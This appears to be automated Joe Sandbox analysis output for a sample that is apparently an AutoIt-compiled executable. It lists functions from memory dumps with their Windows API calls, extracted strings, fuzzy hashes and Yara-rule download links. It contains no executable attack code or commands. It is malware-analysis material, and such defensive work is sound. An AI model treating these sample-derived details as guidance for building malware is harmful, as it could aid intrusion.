API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 5245c215db07a8b618eb1c1081f8e0e2890ff582ed5ed661a8809d54e69f0d29
Instruction ID: 6148c639e38d2673da057270576c08c297852c1aba7e63c43d264ebce2ef6e28
Opcode Fuzzy Hash: 5245c215db07a8b618eb1c1081f8e0e2890ff582ed5ed661a8809d54e69f0d29
Instruction Fuzzy Hash: 805139B24187449BE320AF50E885BABBBF8FB85315F51885DF2D8411A2DB7095398B26

Function 00288096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00288186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0028819B

Strings

', xrefs: 002880EF

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: c109f5e0b00b4bccee0513b713822c9980c072ca2c32e5864401973fb04ff982
Instruction ID: 6a46d25dceb5c2fe7a61256acc0837456e9939d8c0d077139c6dc2bd5382481f
Opcode Fuzzy Hash: c109f5e0b00b4bccee0513b713822c9980c072ca2c32e5864401973fb04ff982
Instruction Fuzzy Hash: 1A410C78A1120A9FDB14DF64D885BDABBB5FF08300F50016AE908EB391DB71A955CF90

Function 00272C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00272C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00272CA0

Strings

|, xrefs: 00272C71

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 2d3a67760ee72e57ab624e60541d1f99849a97bbcd75a29b166a925188a78c91
Instruction ID: dbd05a4fc96a6ff13b0122399649501374a09cb549b6f686bb6643676452c936
Opcode Fuzzy Hash: 2d3a67760ee72e57ab624e60541d1f99849a97bbcd75a29b166a925188a78c91
Instruction Fuzzy Hash: E5313A71C10119EBCF11DFA1CC85AEEBFB9FF14300F104059F928A6166DA715A66DFA0

Function 00287088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0028713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00287178

Strings

static, xrefs: 002870D8

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: f7308261166d64e933823d26d423805d1e20f0aa75429ddb9e2c9a0b1d3f600b
Instruction ID: 9efafa646d3d8ba6da337d508f8b75049948e92030c67991d3a41731889ff408
Opcode Fuzzy Hash: f7308261166d64e933823d26d423805d1e20f0aa75429ddb9e2c9a0b1d3f600b
Instruction Fuzzy Hash: 7B319075120605AEEB10AF74DC84BFB73A9FF48720F109619F99987191DB30ACA1CB60

Function 00263049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002630B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002630F3

Strings

0, xrefs: 002630B1

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 35ebeae67443d72d4a27bdaf70e11ed6470b9953d11bf9793c5845401e9091b3
Instruction ID: d2ea55fd95f3eecad425b6233527f3672201b15c64197fe6f526105b79a23cfe
Opcode Fuzzy Hash: 35ebeae67443d72d4a27bdaf70e11ed6470b9953d11bf9793c5845401e9091b3
Instruction Fuzzy Hash: 6331A731620206ABEB24CF54D985FAEBBB9FF06350F144059ED89A61A1D7709BE4CF50

Function 002740B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00274132

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

Strings

AUTOITCALLVARIABLE%d, xrefs: 00274124
, $, xrefs: 00274172

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: cc3dff641704a8b2edf4230bec9527d14921995ba5ac4a244b2782fba98de56a
Instruction ID: e02e8ec63e81e06b8ebc21beae84d1f70dd3b091303f640fcb512d8be0dbcfc6
Opcode Fuzzy Hash: cc3dff641704a8b2edf4230bec9527d14921995ba5ac4a244b2782fba98de56a
Instruction Fuzzy Hash: 2B217F30A2021DABCF10FF64C885EEE77A9AF55341F404455F909A7181DB70A9A5CFA1

Function 00286CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00286D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00286D91

Strings

Combobox, xrefs: 00286D53

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: a337f94959bccdf4cc5c808a6631209bd9ff71d6fde9ef2fbede8e7b174c4fcf
Instruction ID: 45e2589479fdcd7600ea08dcebfe72f38d60d7f8ac61bfef79a04073c14c35cc
Opcode Fuzzy Hash: a337f94959bccdf4cc5c808a6631209bd9ff71d6fde9ef2fbede8e7b174c4fcf
Instruction Fuzzy Hash: 9111B275321209BFEF11AF54DC89EFB7B6AEB843A4F104129F9189B2D1D6719C708B60

Function 0028722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00202111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0020214F
Part of subcall function 00202111: GetStockObject.GDI32(00000011), ref: 00202163
Part of subcall function 00202111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0020216D

GetWindowRect.USER32(00000000,?), ref: 00287296
GetSysColor.USER32(00000012), ref: 002872B0

Strings

static, xrefs: 00287273

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 31096661e5febe6a2d2dc5a23134fda64b26a882d2b9535e5d767452753439e1
Instruction ID: ce4d8ad2415db47c98549c4f0b91c6b62e8b1d7edf25a3f7d125b8239fc6a2fa
Opcode Fuzzy Hash: 31096661e5febe6a2d2dc5a23134fda64b26a882d2b9535e5d767452753439e1
Instruction Fuzzy Hash: 8321477662420AAFDF04DFB8DC45EEABBA8EB08304F104519FD55D3291D734E8609B50

Function 00286F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00286FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00286FD6

Strings

edit, xrefs: 00286FAB

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: b66bff40db351c31822fd3a3b897b0e99c25969248bda68119a5fa7d0a22b34e
Instruction ID: 5de89aa328d84b22ce9d10c603cc49de20cb3916db042bfaa844a4339655d41b
Opcode Fuzzy Hash: b66bff40db351c31822fd3a3b897b0e99c25969248bda68119a5fa7d0a22b34e
Instruction Fuzzy Hash: 4811BF75121209AFEB106E64FC88EEB3B6AEB15364F104314FA26975E0C771DC609B60

Function 00263156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002631C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002631E8

Strings

0, xrefs: 002631BF

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 8e1c430df916316a2faaf50a4971f35a3ae3292110e9ad650da101d0b565ab9a
Instruction ID: a2d6d51606240d1a1faae9631565074f0d211c736f2bf8ac8917cd4c926d6f97
Opcode Fuzzy Hash: 8e1c430df916316a2faaf50a4971f35a3ae3292110e9ad650da101d0b565ab9a
Instruction Fuzzy Hash: 6811E631920116ABDB20DE98DC49F9D77F8AB07310F1401A6EC59E72A0D770AF55CF91

Function 002034E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 0020351D
DestroyWindow.USER32(?,?,00214E61), ref: 00203576

Strings

h), xrefs: 002034E5

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: h)
API String ID: 2587070983-720724143
Opcode ID: 23bb6d879b013f5d134200a76eacaf02924c463a45d3f8f1597499cad4b8ae90
Instruction ID: 5d22e8f9b075d8b084160f84f0683f44a87d9d8b9c6a5f016ed698e56f383b54
Opcode Fuzzy Hash: 23bb6d879b013f5d134200a76eacaf02924c463a45d3f8f1597499cad4b8ae90
Instruction Fuzzy Hash: 7821EA706293118FCB14DF19FC6CE2537E9AB58310B444269E9068B2F2DB70DE64DF81

Function 002728A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002728F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00272921

Strings

<local>, xrefs: 002728E9

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: c2c42e111df8bc454ee10ba7ddd75d12733b0b5688970b31c775ce3e6c0c11fb
Instruction ID: 491a9c13a5d8dba5d9a0be6e05f80c169f74175691601fecedff8ebf1da04de3
Opcode Fuzzy Hash: c2c42e111df8bc454ee10ba7ddd75d12733b0b5688970b31c775ce3e6c0c11fb
Instruction Fuzzy Hash: 7911A370521226FAEB258F518C89EF7FBACFF06751F10C12AF94956100E3B159A8D6F1

Function 0026D116 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0026D180

Strings

0.0.0.0, xrefs: 0026D18E
L,), xrefs: 0026D12E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _wcscmp
String ID: 0.0.0.0$L,)
API String ID: 856254489-3372466104
Opcode ID: f674d9baa94d7abeb5cf80b4bd238d1c1caf8cfd304beaf742cad9497ceeb3e3
Instruction ID: 2eefcab6b4a9dfedf6d49b602d2df54c2f604a49de5952ecd4fd576d050382ed
Opcode Fuzzy Hash: f674d9baa94d7abeb5cf80b4bd238d1c1caf8cfd304beaf742cad9497ceeb3e3
Instruction Fuzzy Hash: 5A11B675B202099FCB04EF14C881E59B3B4AF46711F10C089EA0D5F3A2CA70EDA5CB50

Function 00278475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 002786E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0027849D,?,00000000,?,?), ref: 002786F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002784A0
htons.WSOCK32(00000000,?,00000000), ref: 002784DD

Strings

255.255.255.255, xrefs: 002784B8

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 8786e300d958edc48f00dfd98ae584bfd9c5c3f405f3414d5c3723e61bf7955a
Instruction ID: bcf1fee70f1d00071e33dcb3c7fd57d6f11f4536f0c850b0f03a177ada22fdf4
Opcode Fuzzy Hash: 8786e300d958edc48f00dfd98ae584bfd9c5c3f405f3414d5c3723e61bf7955a
Instruction Fuzzy Hash: 2311C83516020AABDB20EF64DC5AFEEB364FF04320F108517FA19572D1DBB1A824CB95

Function 002599BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

Part of subcall function 0025B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0025B7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00259A2B

Strings

ComboBox, xrefs: 002599CA
ListBox, xrefs: 002599F5

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: dd955525e18e1cafb8fc2a8979506869b3e7ee730b22f4e3dc88b8e6edee9e79
Instruction ID: 7251a22c9015e4c11da1db43321591f27b4c964d6e420f3cc375f3ce75fb751d
Opcode Fuzzy Hash: dd955525e18e1cafb8fc2a8979506869b3e7ee730b22f4e3dc88b8e6edee9e79
Instruction Fuzzy Hash: 2C01F572A71114AB8B24EFA4CC51DFEB7A9AF5A360B100609FC61532C1DB30597CCB64

Function 0020BBC6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0020BC07

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

_wcscat.LIBCMT ref: 00243593

Strings

s,, xrefs: 0020BC47

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: s,
API String ID: 257928180-3539718730
Opcode ID: 3a69de8272cdbb8d07f3e484b605f71cff75433328dce76014b5ccf860911d0f
Instruction ID: a7e9ff9ea4d69654986cd3c46e33f3a8f5eeacce430f081f49cf318a136c04c0
Opcode Fuzzy Hash: 3a69de8272cdbb8d07f3e484b605f71cff75433328dce76014b5ccf860911d0f
Instruction Fuzzy Hash: 13118235924308ABDB15EBA49942ECD77E8FF08350B1041AABD4497291DF709BF49F51

Function 0026934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00269367
__fread_nolock.LIBCMT ref: 0026937C

Strings

EA06, xrefs: 002693AE

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 7841a09d61f1b0f124d52e51f52f94b3388d5af992ad473db612dce8a250e0d1
Instruction ID: 20137cc6bbd6ac18f6fd299ad3e8a89e08e31550fef900a564e566fa512c307f
Opcode Fuzzy Hash: 7841a09d61f1b0f124d52e51f52f94b3388d5af992ad473db612dce8a250e0d1
Instruction Fuzzy Hash: A001F9728142687EDB28CBE8C856EFE7BFC9F11301F00429AF552D2281E5B5E6648B60

Function 002598B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

Part of subcall function 0025B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0025B7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00259923

Strings

ComboBox, xrefs: 002598C2
ListBox, xrefs: 002598ED

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: fb5618e8189dbf0d95a5c0a21bf73cf4e166687ccdd8e1a96a4debba3cc1379d
Instruction ID: 681df4fdb4e9dae8564e0e84f85267ad39850801656046c25c47b6c8545ade44
Opcode Fuzzy Hash: fb5618e8189dbf0d95a5c0a21bf73cf4e166687ccdd8e1a96a4debba3cc1379d
Instruction Fuzzy Hash: DC018472A71109ABCB24EBA0C956EFFB7AC9F29341F100119BD4163281DA305E7C9AB5

Function 0025993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

Part of subcall function 0025B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0025B7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 002599A6

Strings

ComboBox, xrefs: 00259947
ListBox, xrefs: 00259972

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 994dac6e83a5bd8f08a576f13c72f7f90b303b39fc979174aee8de3ea127ffea
Instruction ID: 6542340a870ac68acd89065bc252679f5321fbf1b0207a7e65b72afa918cb2e5
Opcode Fuzzy Hash: 994dac6e83a5bd8f08a576f13c72f7f90b303b39fc979174aee8de3ea127ffea
Instruction Fuzzy Hash: 3C01A772A71108AACB20EBA4C952EFFB7AD9F25341F100019BD4563281DA354F7C9AB6

Function 00226D9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00226DC0
__calloc_crt.LIBCMT ref: 00226DD9

Strings

@b,, xrefs: 00226DF0

Memory Dump Source

